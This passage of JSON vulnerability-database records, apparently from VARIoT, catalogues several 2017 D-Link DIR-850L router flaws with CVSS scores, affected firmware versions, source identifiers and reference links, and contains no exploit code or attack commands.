"exploitabilityScore": 8.6,
"id": "VHN-105141",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.9,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14420",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14420",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-31789",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-575",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-105141",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"db": "VULHUB",
"id": "VHN-105141"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"db": "NVD",
"id": "CVE-2017-14420"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The D-Link NPAPI extension, as used on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices, does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. D-Link DIR-850L There is a certificate validation vulnerability in the device firmware.Information may be obtained. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the D-LinkDIR-850LREV.A using FW114WWb07_h2ab_beta1 and previous firmware and the D-LinkNPAPI extension used in the REV.B device using FW208WWb02 and previous firmware. The vulnerability stems from the program failing to verify the X of the SSL server. 509 certificate",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14420"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"db": "VULHUB",
"id": "VHN-105141"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14420",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008139",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-575",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31789",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105141",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"db": "VULHUB",
"id": "VHN-105141"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"db": "NVD",
"id": "CVE-2017-14420"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
]
},
"id": "VAR-201709-0591",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"db": "VULHUB",
"id": "VHN-105141"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31789"
}
]
},
"last_update_date": "2023-12-18T13:38:52.801000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235002"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-295",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105141"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"db": "NVD",
"id": "CVE-2017-14420"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14420"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14420"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"db": "VULHUB",
"id": "VHN-105141"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"db": "NVD",
"id": "CVE-2017-14420"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"db": "VULHUB",
"id": "VHN-105141"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"db": "NVD",
"id": "CVE-2017-14420"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105141"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"date": "2017-09-13T17:29:00.493000",
"db": "NVD",
"id": "CVE-2017-14420"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"date": "2017-09-21T00:00:00",
"db": "VULHUB",
"id": "VHN-105141"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"date": "2023-11-17T19:58:23.067000",
"db": "NVD",
"id": "CVE-2017-14420"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerability related to certificate validation in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
],
"trust": 0.6
}
}
VAR-201709-0589
Vulnerability from variot - Updated: 2023-12-18 13:34The D-Link NPAPI extension, as used in conjunction with D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices, sends the cleartext admin password over the Internet as part of interaction with mydlink Cloud Services. D-Link DIR-850L The device firmware contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in the D-Link NPAPI extension used in the D-LinkDIR-850LREV.B device using FW208WWb02 and previous firmware. An attacker could use this vulnerability to retrieve an administrator password
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0589",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"db": "NVD",
"id": "CVE-2017-14418"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14418"
}
]
},
"cve": "CVE-2017-14418",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14418",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-31791",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-105138",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14418",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14418",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-31791",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-577",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105138",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"db": "VULHUB",
"id": "VHN-105138"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"db": "NVD",
"id": "CVE-2017-14418"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The D-Link NPAPI extension, as used in conjunction with D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices, sends the cleartext admin password over the Internet as part of interaction with mydlink Cloud Services. D-Link DIR-850L The device firmware contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in the D-Link NPAPI extension used in the D-LinkDIR-850LREV.B device using FW208WWb02 and previous firmware. An attacker could use this vulnerability to retrieve an administrator password",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14418"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"db": "VULHUB",
"id": "VHN-105138"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14418",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008137",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-577",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31791",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105138",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"db": "VULHUB",
"id": "VHN-105138"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"db": "NVD",
"id": "CVE-2017-14418"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
]
},
"id": "VAR-201709-0589",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"db": "VULHUB",
"id": "VHN-105138"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31791"
}
]
},
"last_update_date": "2023-12-18T13:34:08.156000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100053"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105138"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"db": "NVD",
"id": "CVE-2017-14418"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14418"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14418"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"db": "VULHUB",
"id": "VHN-105138"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"db": "NVD",
"id": "CVE-2017-14418"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"db": "VULHUB",
"id": "VHN-105138"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"db": "NVD",
"id": "CVE-2017-14418"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105138"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"date": "2017-09-13T17:29:00.400000",
"db": "NVD",
"id": "CVE-2017-14418"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31791"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105138"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008137"
},
{
"date": "2023-11-08T20:58:01.420000",
"db": "NVD",
"id": "CVE-2017-14418"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to certificate / password management in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008137"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-577"
}
],
"trust": 0.6
}
}
VAR-201709-0595
Vulnerability from variot - Updated: 2023-12-18 13:29D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/passwd permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit the vulnerability to obtain a certificate
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0595",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"db": "NVD",
"id": "CVE-2017-14424"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
